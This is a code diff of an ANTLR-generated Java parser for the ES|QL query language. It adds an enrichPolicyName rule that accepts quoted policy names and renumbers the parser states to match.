makeRuleNames() { return new String[] { "singleStatement", "query", "sourceCommand", "processingCommand", "whereCommand", @@ -95,9 +95,9 @@ private static String[] makeRuleNames() { "limitCommand", "sortCommand", "orderExpression", "keepCommand", "dropCommand", "renameCommand", "renameClause", "dissectCommand", "grokCommand", "mvExpandCommand", "commandOptions", "commandOption", "explainCommand", "subqueryExpression", - "showCommand", "enrichCommand", "enrichWithClause", "sampleCommand", - "lookupCommand", "inlinestatsCommand", "changePointCommand", "insistCommand", - "forkCommand", "forkSubQueries", "forkSubQuery", "forkSubQueryCommand", + "showCommand", "enrichCommand", "enrichPolicyName", "enrichWithClause", + "sampleCommand", "lookupCommand", "inlinestatsCommand", "changePointCommand", + "insistCommand", "forkCommand", "forkSubQueries", "forkSubQuery", "forkSubQueryCommand", "forkSubQueryProcessingCommand", "rrfCommand", "inferenceCommandOptions", "inferenceCommandOption", "inferenceCommandOptionValue", "rerankCommand", "completionCommand", "booleanExpression", "regexBooleanExpression", "matchBooleanExpression", @@ -244,9 +244,9 @@ public final SingleStatementContext singleStatement() throws RecognitionExceptio try { enterOuterAlt(_localctx, 1); { - setState(172); + setState(174); query(0); - setState(173); + setState(175); match(EOF); } } @@ -342,11 +342,11 @@ private QueryContext query(int _p) throws RecognitionException { _ctx = _localctx; _prevctx = _localctx; - setState(176); + setState(178); sourceCommand(); } _ctx.stop = _input.LT(-1); - setState(183); + setState(185); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,0,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -357,16 +357,16 @@ private QueryContext query(int _p) throws RecognitionException { { _localctx = new CompositeQueryContext(new QueryContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_query); - setState(178); + setState(180); if (!(precpred(_ctx, 1))) throw new FailedPredicateException(this, "precpred(_ctx, 1)"); - setState(179); + setState(181); match(PIPE); - setState(180); + setState(182); processingCommand(); } } } - setState(185); + setState(187); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,0,_ctx); } @@ -424,45 +424,45 @@ public final SourceCommandContext sourceCommand() throws RecognitionException { SourceCommandContext _localctx = new SourceCommandContext(_ctx, getState()); enterRule(_localctx, 4, RULE_sourceCommand); try { - setState(193); + setState(195); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,1,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(186); + setState(188); fromCommand(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(187); + setState(189); rowCommand(); } break; case 3: enterOuterAlt(_localctx, 3); { - setState(188); + setState(190); showCommand(); } break; case 4: enterOuterAlt(_localctx, 4); { - setState(189); + setState(191); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(190); + setState(192); timeSeriesCommand(); } break; case 5: enterOuterAlt(_localctx, 5); { - setState(191); + setState(193); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(192); + setState(194); explainCommand(); } break; @@ -571,170 +571,170 @@ public final ProcessingCommandContext processingCommand() throws RecognitionExce ProcessingCommandContext _localctx = new ProcessingCommandContext(_ctx, getState()); enterRule(_localctx, 6, RULE_processingCommand); try { - setState(222); + setState(224); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,2,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(195); + setState(197); evalCommand(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(196); + setState(198); whereCommand(); } break; case 3: enterOuterAlt(_localctx, 3); { - setState(197); + setState(199); keepCommand(); } break; case 4: enterOuterAlt(_localctx, 4); { - setState(198); + setState(200); limitCommand(); } break; case 5: enterOuterAlt(_localctx, 5); { - setState(199); + setState(201); statsCommand(); } break; case 6: enterOuterAlt(_localctx, 6); { - setState(200); + setState(202); sortCommand(); } break; case 7: enterOuterAlt(_localctx, 7); { - setState(201); + setState(203); dropCommand(); } break; case 8: enterOuterAlt(_localctx, 8); { - setState(202); + setState(204); renameCommand(); } break; case 9: enterOuterAlt(_localctx, 9); { - setState(203); + setState(205); dissectCommand(); } break; case 10: enterOuterAlt(_localctx, 10); { - setState(204); + setState(206); grokCommand(); } break; case 11: enterOuterAlt(_localctx, 11); { - setState(205); + setState(207); enrichCommand(); } break; case 12: enterOuterAlt(_localctx, 12); { - setState(206); + setState(208); mvExpandCommand(); } break; case 13: enterOuterAlt(_localctx, 13); { - setState(207); + setState(209); joinCommand(); } break; case 14: enterOuterAlt(_localctx, 14); { - setState(208); + setState(210); changePointCommand(); } break; case 15: enterOuterAlt(_localctx, 15); { - setState(209); + setState(211); completionCommand(); } break; case 16: enterOuterAlt(_localctx, 16); { - setState(210); + setState(212); sampleCommand(); } break; case 17: enterOuterAlt(_localctx, 17); { - setState(211); + setState(213); forkCommand(); } break; case 18: enterOuterAlt(_localctx, 18); { - setState(212); + setState(214); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(213); + setState(215); inlinestatsCommand(); } break; case 19: enterOuterAlt(_localctx, 19); { - setState(214); + setState(216); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(215); + setState(217); lookupCommand(); } break; case 20: enterOuterAlt(_localctx, 20); { - setState(216); + setState(218); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(217); + setState(219); insistCommand(); } break; case 21: enterOuterAlt(_localctx, 21); { - setState(218); + setState(220); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(219); + setState(221); rerankCommand(); } break; case 22: enterOuterAlt(_localctx, 22); { - setState(220); + setState(222); if (!(this.isDevVersion())) throw new FailedPredicateException(this, "this.isDevVersion()"); - setState(221); + setState(223); rrfCommand(); } break; @@ -783,9 +783,9 @@ public final WhereCommandContext whereCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(224); + setState(226); match(WHERE); - setState(225); + setState(227); booleanExpression(0); } } @@ -843,7 +843,7 @@ public final DataTypeContext dataType() throws RecognitionException { _localctx = new ToDataTypeContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(227); + setState(229); identifier(); } } @@ -890,9 +890,9 @@ public final RowCommandContext rowCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(229); + setState(231); match(ROW); - setState(230); + setState(232); fields(); } } @@ -946,23 +946,23 @@ public final FieldsContext fields() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(232); + setState(234); field(); - setState(237); + setState(239); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,3,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(233); + setState(235); match(COMMA); - setState(234); + setState(236); field(); } } } - setState(239); + setState(241); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,3,_ctx); } @@ -1014,19 +1014,19 @@ public final FieldContext field() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(243); + setState(245); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,4,_ctx) ) { case 1: { - setState(240); + setState(242); qualifiedName(); - setState(241); + setState(243); match(ASSIGN); } break; } - setState(245); + setState(247); booleanExpression(0); } } @@ -1080,23 +1080,23 @@ public final RerankFieldsContext rerankFields() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(247); + setState(249); rerankField(); - setState(252); + setState(254); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,5,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(248); + setState(250); match(COMMA); - setState(249); + setState(251); rerankField(); } } } - setState(254); + setState(256); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,5,_ctx); } @@ -1148,16 +1148,16 @@ public final RerankFieldContext rerankField() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(255); + setState(257); qualifiedName(); - setState(258); + setState(260); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,6,_ctx) ) { case 1: { - setState(256); + setState(258); match(ASSIGN); - setState(257); + setState(259); booleanExpression(0); } break; @@ -1207,9 +1207,9 @@ public final FromCommandContext fromCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(260); + setState(262); match(FROM); - setState(261); + setState(263); indexPatternAndMetadataFields(); } } @@ -1256,9 +1256,9 @@ public final TimeSeriesCommandContext timeSeriesCommand() throws RecognitionExce try { enterOuterAlt(_localctx, 1); { - setState(263); + setState(265); match(DEV_TIME_SERIES); - setState(264); + setState(266); indexPatternAndMetadataFields(); } } @@ -1315,32 +1315,32 @@ public final IndexPatternAndMetadataFieldsContext indexPatternAndMetadataFields( int _alt; enterOuterAlt(_localctx, 1); { - setState(266); + setState(268); indexPattern(); - setState(271); + setState(273); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,7,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(267); + setState(269); match(COMMA); - setState(268); + setState(270); indexPattern(); } } } - setState(273); + setState(275); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,7,_ctx); } - setState(275); + setState(277); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,8,_ctx) ) { case 1: { - setState(274); + setState(276); metadata(); } break; @@ -1398,35 +1398,35 @@ public final IndexPatternContext indexPattern() throws RecognitionException { IndexPatternContext _localctx = new IndexPatternContext(_ctx, getState()); enterRule(_localctx, 28, RULE_indexPattern); try { - setState(286); + setState(288); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,9,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(277); + setState(279); clusterString(); - setState(278); + setState(280); match(COLON); - setState(279); + setState(281); unquotedIndexString(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(281); + setState(283); unquotedIndexString(); - setState(282); + setState(284); match(CAST_OP); - setState(283); + setState(285); selectorString(); } break; case 3: enterOuterAlt(_localctx, 3); { - setState(285); + setState(287); indexString(); } break; @@ -1472,7 +1472,7 @@ public final ClusterStringContext clusterString() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(288); + setState(290); match(UNQUOTED_SOURCE); } } @@ -1516,7 +1516,7 @@ public final SelectorStringContext selectorString() throws RecognitionException try { enterOuterAlt(_localctx, 1); { - setState(290); + setState(292); match(UNQUOTED_SOURCE); } } @@ -1560,7 +1560,7 @@ public final UnquotedIndexStringContext unquotedIndexString() throws Recognition try { enterOuterAlt(_localctx, 1); { - setState(292); + setState(294); match(UNQUOTED_SOURCE); } } @@ -1606,7 +1606,7 @@ public final IndexStringContext indexString() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(294); + setState(296); _la = _input.LA(1); if ( !(_la==QUOTED_STRING || _la==UNQUOTED_SOURCE) ) { _errHandler.recoverInline(this); @@ -1667,25 +1667,25 @@ public final MetadataContext metadata() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(296); + setState(298); match(METADATA); - setState(297); + setState(299); match(UNQUOTED_SOURCE); - setState(302); + setState(304); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,10,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(298); + setState(300); match(COMMA); - setState(299); + setState(301); match(UNQUOTED_SOURCE); } } } - setState(304); + setState(306); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,10,_ctx); } @@ -1734,9 +1734,9 @@ public final EvalCommandContext evalCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(305); + setState(307); match(EVAL); - setState(306); + setState(308); fields(); } } @@ -1789,26 +1789,26 @@ public final StatsCommandContext statsCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(308); - match(STATS); setState(310); + match(STATS); + setState(312); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,11,_ctx) ) { case 1: { - setState(309); + setState(311); ((StatsCommandContext)_localctx).stats = aggFields(); } break; } - setState(314); + setState(316); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,12,_ctx) ) { case 1: { - setState(312); + setState(314); match(BY); - setState(313); + setState(315); ((StatsCommandContext)_localctx).grouping = fields(); } break; @@ -1865,23 +1865,23 @@ public final AggFieldsContext aggFields() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(316); + setState(318); aggField(); - setState(321); + setState(323); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,13,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(317); + setState(319); match(COMMA); - setState(318); + setState(320); aggField(); } } } - setState(323); + setState(325); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,13,_ctx); } @@ -1933,16 +1933,16 @@ public final AggFieldContext aggField() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(324); + setState(326); field(); - setState(327); + setState(329); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,14,_ctx) ) { case 1: { - setState(325); + setState(327); match(WHERE); - setState(326); + setState(328); booleanExpression(0); } break; @@ -1999,23 +1999,23 @@ public final QualifiedNameContext qualifiedName() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(329); + setState(331); identifierOrParameter(); - setState(334); + setState(336); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,15,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(330); + setState(332); match(DOT); - setState(331); + setState(333); identifierOrParameter(); } } } - setState(336); + setState(338); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,15,_ctx); } @@ -2071,23 +2071,23 @@ public final QualifiedNamePatternContext qualifiedNamePattern() throws Recogniti int _alt; enterOuterAlt(_localctx, 1); { - setState(337); + setState(339); identifierPattern(); - setState(342); + setState(344); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,16,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(338); + setState(340); match(DOT); - setState(339); + setState(341); identifierPattern(); } } } - setState(344); + setState(346); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,16,_ctx); } @@ -2143,23 +2143,23 @@ public final QualifiedNamePatternsContext qualifiedNamePatterns() throws Recogni int _alt; enterOuterAlt(_localctx, 1); { - setState(345); + setState(347); qualifiedNamePattern(); - setState(350); + setState(352); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,17,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(346); + setState(348); match(COMMA); - setState(347); + setState(349); qualifiedNamePattern(); } } } - setState(352); + setState(354); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,17,_ctx); } @@ -2207,7 +2207,7 @@ public final IdentifierContext identifier() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(353); + setState(355); _la = _input.LA(1); if ( !(_la==UNQUOTED_IDENTIFIER || _la==QUOTED_IDENTIFIER) ) { _errHandler.recoverInline(this); @@ -2263,13 +2263,13 @@ public final IdentifierPatternContext identifierPattern() throws RecognitionExce IdentifierPatternContext _localctx = new IdentifierPatternContext(_ctx, getState()); enterRule(_localctx, 56, RULE_identifierPattern); try { - setState(358); + setState(360); _errHandler.sync(this); switch (_input.LA(1)) { case ID_PATTERN: enterOuterAlt(_localctx, 1); { - setState(355); + setState(357); match(ID_PATTERN); } break; @@ -2277,7 +2277,7 @@ public final IdentifierPatternContext identifierPattern() throws RecognitionExce case NAMED_OR_POSITIONAL_PARAM: enterOuterAlt(_localctx, 2); { - setState(356); + setState(358); parameter(); } break; @@ -2285,7 +2285,7 @@ public final IdentifierPatternContext identifierPattern() throws RecognitionExce case NAMED_OR_POSITIONAL_DOUBLE_PARAMS: enterOuterAlt(_localctx, 3); { - setState(357); + setState(359); doubleParameter(); } break; @@ -2361,14 +2361,14 @@ public final ParameterContext parameter() throws RecognitionException { ParameterContext _localctx = new ParameterContext(_ctx, getState()); enterRule(_localctx, 58, RULE_parameter); try { - setState(362); + setState(364); _errHandler.sync(this); switch (_input.LA(1)) { case PARAM: _localctx = new InputParamContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(360); + setState(362); match(PARAM); } break; @@ -2376,7 +2376,7 @@ public final ParameterContext parameter() throws RecognitionException { _localctx = new InputNamedOrPositionalParamContext(_localctx); enterOuterAlt(_localctx, 2); { - setState(361); + setState(363); match(NAMED_OR_POSITIONAL_PARAM); } break; @@ -2452,14 +2452,14 @@ public final DoubleParameterContext doubleParameter() throws RecognitionExceptio DoubleParameterContext _localctx = new DoubleParameterContext(_ctx, getState()); enterRule(_localctx, 60, RULE_doubleParameter); try { - setState(366); + setState(368); _errHandler.sync(this); switch (_input.LA(1)) { case DOUBLE_PARAMS: _localctx = new InputDoubleParamsContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(364); + setState(366); match(DOUBLE_PARAMS); } break; @@ -2467,7 +2467,7 @@ public final DoubleParameterContext doubleParameter() throws RecognitionExceptio _localctx = new InputNamedOrPositionalDoubleParamsContext(_localctx); enterOuterAlt(_localctx, 2); { - setState(365); + setState(367); match(NAMED_OR_POSITIONAL_DOUBLE_PARAMS); } break; @@ -2521,14 +2521,14 @@ public final IdentifierOrParameterContext identifierOrParameter() throws Recogni IdentifierOrParameterContext _localctx = new IdentifierOrParameterContext(_ctx, getState()); enterRule(_localctx, 62, RULE_identifierOrParameter); try { - setState(371); + setState(373); _errHandler.sync(this); switch (_input.LA(1)) { case UNQUOTED_IDENTIFIER: case QUOTED_IDENTIFIER: enterOuterAlt(_localctx, 1); { - setState(368); + setState(370); identifier(); } break; @@ -2536,7 +2536,7 @@ public final IdentifierOrParameterContext identifierOrParameter() throws Recogni case NAMED_OR_POSITIONAL_PARAM: enterOuterAlt(_localctx, 2); { - setState(369); + setState(371); parameter(); } break; @@ -2544,7 +2544,7 @@ public final IdentifierOrParameterContext identifierOrParameter() throws Recogni case NAMED_OR_POSITIONAL_DOUBLE_PARAMS: enterOuterAlt(_localctx, 3); { - setState(370); + setState(372); doubleParameter(); } break; @@ -2595,9 +2595,9 @@ public final LimitCommandContext limitCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(373); + setState(375); match(LIMIT); - setState(374); + setState(376); constant(); } } @@ -2652,25 +2652,25 @@ public final SortCommandContext sortCommand() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(376); + setState(378); match(SORT); - setState(377); + setState(379); orderExpression(); - setState(382); + setState(384); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,22,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(378); + setState(380); match(COMMA); - setState(379); + setState(381); orderExpression(); } } } - setState(384); + setState(386); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,22,_ctx); } @@ -2726,14 +2726,14 @@ public final OrderExpressionContext orderExpression() throws RecognitionExceptio try { enterOuterAlt(_localctx, 1); { - setState(385); - booleanExpression(0); setState(387); + booleanExpression(0); + setState(389); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,23,_ctx) ) { case 1: { - setState(386); + setState(388); ((OrderExpressionContext)_localctx).ordering = _input.LT(1); _la = _input.LA(1); if ( !(_la==ASC || _la==DESC) ) { @@ -2747,14 +2747,14 @@ public final OrderExpressionContext orderExpression() throws RecognitionExceptio } break; } - setState(391); + setState(393); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,24,_ctx) ) { case 1: { - setState(389); + setState(391); match(NULLS); - setState(390); + setState(392); ((OrderExpressionContext)_localctx).nullOrdering = _input.LT(1); _la = _input.LA(1); if ( !(_la==FIRST || _la==LAST) ) { @@ -2813,9 +2813,9 @@ public final KeepCommandContext keepCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(393); + setState(395); match(KEEP); - setState(394); + setState(396); qualifiedNamePatterns(); } } @@ -2862,9 +2862,9 @@ public final DropCommandContext dropCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(396); + setState(398); match(DROP); - setState(397); + setState(399); qualifiedNamePatterns(); } } @@ -2919,25 +2919,25 @@ public final RenameCommandContext renameCommand() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(399); + setState(401); match(RENAME); - setState(400); + setState(402); renameClause(); - setState(405); + setState(407); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,25,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(401); + setState(403); match(COMMA); - setState(402); + setState(404); renameClause(); } } } - setState(407); + setState(409); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,25,_ctx); } @@ -2990,28 +2990,28 @@ public final RenameClauseContext renameClause() throws RecognitionException { RenameClauseContext _localctx = new RenameClauseContext(_ctx, getState()); enterRule(_localctx, 76, RULE_renameClause); try { - setState(416); + setState(418); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,26,_ctx) ) { case 1: enterOuterAlt(_localctx, 1); { - setState(408); + setState(410); ((RenameClauseContext)_localctx).oldName = qualifiedNamePattern(); - setState(409); + setState(411); match(AS); - setState(410); + setState(412); ((RenameClauseContext)_localctx).newName = qualifiedNamePattern(); } break; case 2: enterOuterAlt(_localctx, 2); { - setState(412); + setState(414); ((RenameClauseContext)_localctx).newName = qualifiedNamePattern(); - setState(413); + setState(415); match(ASSIGN); - setState(414); + setState(416); ((RenameClauseContext)_localctx).oldName = qualifiedNamePattern(); } break; @@ -3066,18 +3066,18 @@ public final DissectCommandContext dissectCommand() throws RecognitionException try { enterOuterAlt(_localctx, 1); { - setState(418); + setState(420); match(DISSECT); - setState(419); + setState(421); primaryExpression(0); - setState(420); - string(); setState(422); + string(); + setState(424); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,27,_ctx) ) { case 1: { - setState(421); + setState(423); commandOptions(); } break; @@ -3130,11 +3130,11 @@ public final GrokCommandContext grokCommand() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(424); + setState(426); match(GROK); - setState(425); + setState(427); primaryExpression(0); - setState(426); + setState(428); string(); } } @@ -3181,9 +3181,9 @@ public final MvExpandCommandContext mvExpandCommand() throws RecognitionExceptio try { enterOuterAlt(_localctx, 1); { - setState(428); + setState(430); match(MV_EXPAND); - setState(429); + setState(431); qualifiedName(); } } @@ -3237,23 +3237,23 @@ public final CommandOptionsContext commandOptions() throws RecognitionException int _alt; enterOuterAlt(_localctx, 1); { - setState(431); + setState(433); commandOption(); - setState(436); + setState(438); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,28,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(432); + setState(434); match(COMMA); - setState(433); + setState(435); commandOption(); } } } - setState(438); + setState(440); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,28,_ctx); } @@ -3305,11 +3305,11 @@ public final CommandOptionContext commandOption() throws RecognitionException { try { enterOuterAlt(_localctx, 1); { - setState(439); + setState(441); identifier(); - setState(440); + setState(442); match(ASSIGN); - setState(441); + setState(443); constant(); } } @@ -3356,9 +3356,9 @@ public final ExplainCommandContext explainCommand() throws RecognitionException try { enterOuterAlt(_localctx, 1); { - setState(443); + setState(445); match(DEV_EXPLAIN); - setState(444); + setState(446); subqueryExpression(); } } @@ -3406,11 +3406,11 @@ public final SubqueryExpressionContext subqueryExpression() throws RecognitionEx try { enterOuterAlt(_localctx, 1); { - setState(446); + setState(448); match(LP); - setState(447); + setState(449); query(0); - setState(448); + setState(450); match(RP); } } @@ -3467,9 +3467,9 @@ public final ShowCommandContext showCommand() throws RecognitionException { _localctx = new ShowInfoContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(450); + setState(452); match(SHOW); - setState(451); + setState(453); match(INFO); } } @@ -3486,10 +3486,12 @@ public final ShowCommandContext showCommand() throws RecognitionException { @SuppressWarnings("CheckReturnValue") public static class EnrichCommandContext extends ParserRuleContext { - public Token policyName; + public EnrichPolicyNameContext policyName; public QualifiedNamePatternContext matchField; public TerminalNode ENRICH() { return getToken(EsqlBaseParser.ENRICH, 0); } - public TerminalNode ENRICH_POLICY_NAME() { return getToken(EsqlBaseParser.ENRICH_POLICY_NAME, 0); } + public EnrichPolicyNameContext enrichPolicyName() { + return getRuleContext(EnrichPolicyNameContext.class,0); + } public TerminalNode ON() { return getToken(EsqlBaseParser.ON, 0); } public TerminalNode WITH() { return getToken(EsqlBaseParser.WITH, 0); } public List enrichWithClause() { @@ -3532,46 +3534,46 @@ public final EnrichCommandContext enrichCommand() throws RecognitionException { int _alt; enterOuterAlt(_localctx, 1); { - setState(453); + setState(455); match(ENRICH); - setState(454); - ((EnrichCommandContext)_localctx).policyName = match(ENRICH_POLICY_NAME); - setState(457); + setState(456); + ((EnrichCommandContext)_localctx).policyName = enrichPolicyName(); + setState(459); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,29,_ctx) ) { case 1: { - setState(455); + setState(457); match(ON); - setState(456); + setState(458); ((EnrichCommandContext)_localctx).matchField = qualifiedNamePattern(); } break; } - setState(468); + setState(470); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,31,_ctx) ) { case 1: { - setState(459); + setState(461); match(WITH); - setState(460); + setState(462); enrichWithClause(); - setState(465); + setState(467); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,30,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(461); + setState(463); match(COMMA); - setState(462); + setState(464); enrichWithClause(); } } } - setState(467); + setState(469); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,30,_ctx); } @@ -3591,6 +3593,60 @@ public final EnrichCommandContext enrichCommand() throws RecognitionException { return _localctx; } + @SuppressWarnings("CheckReturnValue") + public static class EnrichPolicyNameContext extends ParserRuleContext { + public TerminalNode ENRICH_POLICY_NAME() { return getToken(EsqlBaseParser.ENRICH_POLICY_NAME, 0); } + public TerminalNode QUOTED_STRING() { return getToken(EsqlBaseParser.QUOTED_STRING, 0); } + @SuppressWarnings("this-escape") + public EnrichPolicyNameContext(ParserRuleContext parent, int invokingState) { + super(parent, invokingState); + } + @Override public int getRuleIndex() { return RULE_enrichPolicyName; } + @Override + public void enterRule(ParseTreeListener listener) { + if ( listener instanceof EsqlBaseParserListener ) ((EsqlBaseParserListener)listener).enterEnrichPolicyName(this); + } + @Override + public void exitRule(ParseTreeListener listener) { + if ( listener instanceof EsqlBaseParserListener ) ((EsqlBaseParserListener)listener).exitEnrichPolicyName(this); + } + @Override + public T accept(ParseTreeVisitor visitor) { + if ( visitor instanceof EsqlBaseParserVisitor ) return ((EsqlBaseParserVisitor)visitor).visitEnrichPolicyName(this); + else return visitor.visitChildren(this); + } + } + + public final EnrichPolicyNameContext enrichPolicyName() throws RecognitionException { + EnrichPolicyNameContext _localctx = new EnrichPolicyNameContext(_ctx, getState()); + enterRule(_localctx, 96, RULE_enrichPolicyName); + int _la; + try { + enterOuterAlt(_localctx, 1); + { + setState(472); + _la = _input.LA(1); + if ( !(_la==ENRICH_POLICY_NAME || _la==QUOTED_STRING) ) { + _errHandler.recoverInline(this); + } + else { + if ( _input.LA(1)==Token.EOF ) matchedEOF = true; + _errHandler.reportMatch(this); + consume(); + } + } + } + catch (RecognitionException re) { + _localctx.exception = re; + _errHandler.reportError(this, re); + _errHandler.recover(this, re); + } + finally { + exitRule(); + } + return _localctx; + } + @SuppressWarnings("CheckReturnValue") public static class EnrichWithClauseContext extends ParserRuleContext { public QualifiedNamePatternContext newName; @@ -3624,23 +3680,23 @@ public T accept(ParseTreeVisitor visitor) { public final EnrichWithClauseContext enrichWithClause() throws RecognitionException { EnrichWithClauseContext _localctx = new EnrichWithClauseContext(_ctx, getState()); - enterRule(_localctx, 96, RULE_enrichWithClause); + enterRule(_localctx, 98, RULE_enrichWithClause); try { enterOuterAlt(_localctx, 1); { - setState(473); + setState(477); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,32,_ctx) ) { case 1: { - setState(470); + setState(474); ((EnrichWithClauseContext)_localctx).newName = qualifiedNamePattern(); - setState(471); + setState(475); match(ASSIGN); } break; } - setState(475); + setState(479); ((EnrichWithClauseContext)_localctx).enrichField = qualifiedNamePattern(); } } @@ -3684,13 +3740,13 @@ public T accept(ParseTreeVisitor visitor) { public final SampleCommandContext sampleCommand() throws RecognitionException { SampleCommandContext _localctx = new SampleCommandContext(_ctx, getState()); - enterRule(_localctx, 98, RULE_sampleCommand); + enterRule(_localctx, 100, RULE_sampleCommand); try { enterOuterAlt(_localctx, 1); { - setState(477); + setState(481); match(SAMPLE); - setState(478); + setState(482); ((SampleCommandContext)_localctx).probability = constant(); } } @@ -3739,17 +3795,17 @@ public T accept(ParseTreeVisitor visitor) { public final LookupCommandContext lookupCommand() throws RecognitionException { LookupCommandContext _localctx = new 